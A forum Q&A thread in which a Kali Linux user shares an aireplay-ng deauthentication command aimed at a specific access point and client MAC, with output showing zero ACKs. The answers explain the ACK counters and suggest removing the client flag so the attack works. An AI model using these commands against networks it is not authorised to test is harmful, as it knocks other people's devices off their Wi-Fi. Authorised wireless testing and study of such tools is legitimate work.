# Aircrack deauth doesn't have any ACK

Tags: aircrack-ng

I have tring to "Deauth" Attack in my Kali Linux, but is do not send any ACK

```
root@kali:~# aireplay-ng --deauth 200 -a 6A:15:90:F4:4D:82 -c     F8:F1:B6:E8:E6:2A --ignore-negative-one wlan0mon 
12:26:31  Waiting for beacon frame (BSSID: 6A:15:90:F4:4D:82) on channel 9
12:26:32  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:32  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:41  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:42  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:02  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:03  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
```

How can I use this attack?

Thanks

Answer (score 4):

[image]

So what is the meaning of [28|63 ACKs]??

It means:
         **[ ACKs received from the client | ACKs received from the AP ]**
in this case 28 ACKs received from the client and 63 ACKs received from AP

But in your case **A zero value definitely tells the client and/or AP did not hear your packets.** 
It may  possible that no one(client) is connected with your target AP.

Comment: Please, put the description of the image!

Answer (score -2):

I know this is old, but just remove "-c " and you should be fine